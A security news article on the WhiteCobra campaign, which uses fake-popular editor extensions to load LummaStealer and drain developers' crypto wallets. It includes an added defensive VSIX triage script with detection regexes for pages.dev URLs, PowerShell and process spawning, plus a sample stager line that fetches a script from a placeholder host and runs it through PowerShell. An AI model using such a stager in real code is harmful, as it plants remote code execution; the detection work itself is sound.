WhiteCobra Targets Developers with Dozens of Malicious Extensions

A threat group known as WhiteCobra has been targeting developers using the popular VSCode, Cursor, and Windsurf source code editing tools with a series of malicious extensions, aiming to drain cryptocurrency wallets. Researchers at security firm Koi Security have been tracking WhiteCobra's activities for over a year, noting that the bad actors continue to push new malicious extensions on a weekly basis.

The group has already been linked to several high-profile incidents, including the theft of $500,000 in cryptocurrency from a Russian blockchain developer in June. Zak Cole, an Ethereum developer, also fell victim to one of WhiteCobra's malicious extensions, which drained his crypto wallet despite having a "perfect OpSec record".

Koi Security researcher Yuval Ronen has been following the threat group's activities and wrote in a report over the weekend that WhiteCobra is behind these recent attacks. Ronen noted that Cole "is not just any victim, he's a security professional with a decade of security experience," highlighting the level of sophistication these attacks have achieved.

Ronen also revealed that WhiteCobra can spin up a new campaign in fewer than three hours, including packaging the malicious extension, promoting it, and profiting from it. The threat group's playbook includes information about its operation, infrastructure, promotional strategies, and even "shocking revenue projections" of $10,000 an hour targeting high-value crypto wallets.

The attackers expect to make significant profits by infecting "whale wallets," with revenue projections as high as $500,000 an hour. This highlights the industrialized nature of extension-based attacks, where threat actors operate with precision and profit from their activities.

How WhiteCobra Targets Developers

The campaign starts with the creation of malicious VSIX extensions, which are published on targeted marketplaces such as Open VSX or VSCode. The bad actors use social media like X and bots to promote them, while automated scripts create fake downloads to give the extensions credibility.

"By faking massive numbers of downloads, they continue to trick developers, and sometimes even marketplace review systems, into thinking their extensions are safe, popular, and vetted," Ronen wrote. "To a casual observer, 100K installs signal legitimacy. That's exactly what they're counting on."

The Attack Chain

Once the malicious extension is installed, it downloads a secondary script from Cloudflare Pages that is specific to particular platforms, including Windows.

This script executes a PowerShell script that downloads and executes a Python script, which in turn executes shellcode. The malware, LummaStealer, then steals crypto wallet data from the system, as well as information about connection services like AnyDesk, VPNs, and VNC, cloud infrastructure, messaging platforms, password managers, and wallet and password management browser extensions.

LummaStealer also communicates with two command-and-control (C2) servers. The leaked playbook reveals more than just the tactics used by WhiteCobra; it exposes the industrialization of extension-based attacks.
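As an added example, not code from the article or from Koi Security's report, the script below statically triages a VSIX package (a zip archive) for the staged-downloader pattern described above: an extension that activates at startup, fetches something from a Cloudflare Pages host, and spawns PowerShell. The sample VSIX, the placeholder `pages.dev` hostname and the indicator patterns are constructed for this example and are not indicators from the report.

```python
import io, json, re, zipfile

# Indicators modelled on the attack chain described above (constructed for this example).
SUSPICIOUS = {
    "cloudflare_pages_url": re.compile(r"https?://[\w.-]+\.pages\.dev", re.I),
    "powershell_invocation": re.compile(r"powershell(\.exe)?\b", re.I),
    "process_spawn": re.compile(r"child_process|\bexec(Sync)?\s*\(|\bspawn\s*\("),
}

def triage_vsix(vsix_bytes: bytes) -> dict:
    """Read a VSIX from memory, record its manifest metadata and activation events,
    scan every bundled .js file for the indicators, and return a report with a verdict."""
    report = {"name": None, "publisher": None, "activation": [], "hits": []}
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        for info in zf.infolist():
            if info.filename == "extension/package.json":
                manifest = json.loads(zf.read(info))
                report["name"] = manifest.get("name")
                report["publisher"] = manifest.get("publisher")
                report["activation"] = manifest.get("activationEvents", [])
            elif info.filename.endswith(".js"):
                text = zf.read(info).decode("utf-8", "replace")
                for label, pattern in SUSPICIOUS.items():
                    if pattern.search(text):
                        report["hits"].append((info.filename, label))
    # Flag the combination: activates on every startup, fetches from pages.dev, spawns a process.
    broad = any(ev in ("*", "onStartupFinished") for ev in report["activation"])
    labels = {label for _, label in report["hits"]}
    needed = {"cloudflare_pages_url", "process_spawn"}
    report["verdict"] = "suspicious" if broad and labels >= needed else "no finding"
    return report

def build_sample_vsix(extension_js: str) -> bytes:
    """Build a minimal in-memory VSIX so the triage runs offline (sample data, not a real extension)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/package.json", json.dumps({
            "name": "sample-ext", "publisher": "sample-pub",
            "activationEvents": ["onStartupFinished"], "main": "./extension.js"}))
        zf.writestr("extension/extension.js", extension_js)
    return buf.getvalue()

# Constructed stager-like snippet with a placeholder hostname (not a real indicator).
STAGER_LIKE = """const { exec } = require('child_process');
fetch('https://placeholder-example.pages.dev/s.ps1').then(r => r.text())
  .then(s => exec('powershell -NoProfile -Command ' + s));"""
BENIGN = "exports.activate = () => vscode.window.showInformationMessage('hi');"

if __name__ == "__main__":
    print(triage_vsix(build_sample_vsix(STAGER_LIKE))["verdict"])  # suspicious
    print(triage_vsix(build_sample_vsix(BENIGN))["verdict"])       # no finding
```

The same check can be run over the `.vsix` files cached under an editor's extensions directory before they are trusted, and the indicator set extended with whatever hosts or commands an incident report actually names.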

The Implications

"Threat actors like WhiteCobra are operating with industrialized precision, while everyday have almost no reliable way to tell safe tools from malicious ones," Ronen wrote. "Marketplace ratings, download counts, and even official reviews can all be manipulated, leaving even seasoned professionals vulnerable."

Without better mechanisms for trust and verification, the advantage remains firmly on the side of the attackers. Developers need to stay vigilant and keep an eye out for suspicious activity in the marketplace.